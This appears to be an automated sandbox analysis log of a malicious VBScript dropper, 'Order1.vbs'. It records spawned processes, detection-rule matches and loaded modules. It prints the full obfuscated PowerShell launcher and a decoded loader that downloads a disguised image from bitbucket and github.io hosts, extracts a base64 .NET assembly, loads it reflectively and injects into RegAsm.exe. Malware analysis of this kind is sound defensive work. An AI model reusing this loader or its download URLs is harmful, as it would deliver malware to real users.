                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02D711187_2_02D71118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02D711087_2_02D71108
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_057205587_2_05720558
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_057216007_2_05721600
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0572088F7_2_0572088F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_05742E7C7_2_05742E7C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_057411787_2_05741178
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_05769C217_2_05769C21
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_057694F87_2_057694F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_057648F87_2_057648F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_05768D607_2_05768D60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_05768D507_2_05768D50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_057694E87_2_057694E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_057696447_2_05769644
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_057648EA7_2_057648EA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0576D30E7_2_0576D30E
                Source: Order1.vbsInitial sample: Strings found which are bigger than 50
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5288
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5288Jump to behavior
                Source: Process Memory Space: powershell.exe PID: 7704, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 7844, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: 4.2.powershell.exe.23096c50000.0.raw.unpack, SimpleZip.csCryptographic APIs: 'CreateDecryptor'
                Source: 4.2.powershell.exe.23096c50000.0.raw.unpack, SimpleZip.csCryptographic APIs: 'TransformFinalBlock'
                Source: 4.2.powershell.exe.23096c50000.0.raw.unpack, SimpleZip.csCryptographic APIs: 'TransformFinalBlock'
                Source: 7.2.RegAsm.exe.4125ac8.7.raw.unpack, w0gUvjn1pmlF6l1K21B.csCryptographic APIs: 'CreateDecryptor'
                Source: 7.2.RegAsm.exe.4125ac8.7.raw.unpack, w0gUvjn1pmlF6l1K21B.csCryptographic APIs: 'CreateDecryptor'
                Source: 7.2.RegAsm.exe.4125ac8.7.raw.unpack, w0gUvjn1pmlF6l1K21B.csCryptographic APIs: 'CreateDecryptor'
                Source: 7.2.RegAsm.exe.4205b28.5.raw.unpack, w0gUvjn1pmlF6l1K21B.csCryptographic APIs: 'CreateDecryptor'
                Source: 7.2.RegAsm.exe.4205b28.5.raw.unpack, w0gUvjn1pmlF6l1K21B.csCryptographic APIs: 'CreateDecryptor'
                Source: 7.2.RegAsm.exe.4205b28.5.raw.unpack, w0gUvjn1pmlF6l1K21B.csCryptographic APIs: 'CreateDecryptor'
                Source: classification engineClassification label: mal100.spre.expl.evad.winVBS@8/7@4/4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\fdcfab3c666edcce
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:120:WilError_03
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4njcxxwo.2nx.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order1.vbs"
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Order1.vbsVirustotal: Detection: 19%
                Source: Order1.vbsReversingLabs: Detection: 16%
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order1.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@C
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.deFgIei/niam/sdaeh/sfer/wenarak/312eihcir/moc.tnetnocresubuhtig.war//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.deFgIei/niam/sdaeh/sfer/wenarak/312eihcir/moc.tnetnocresubuhtig.war//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
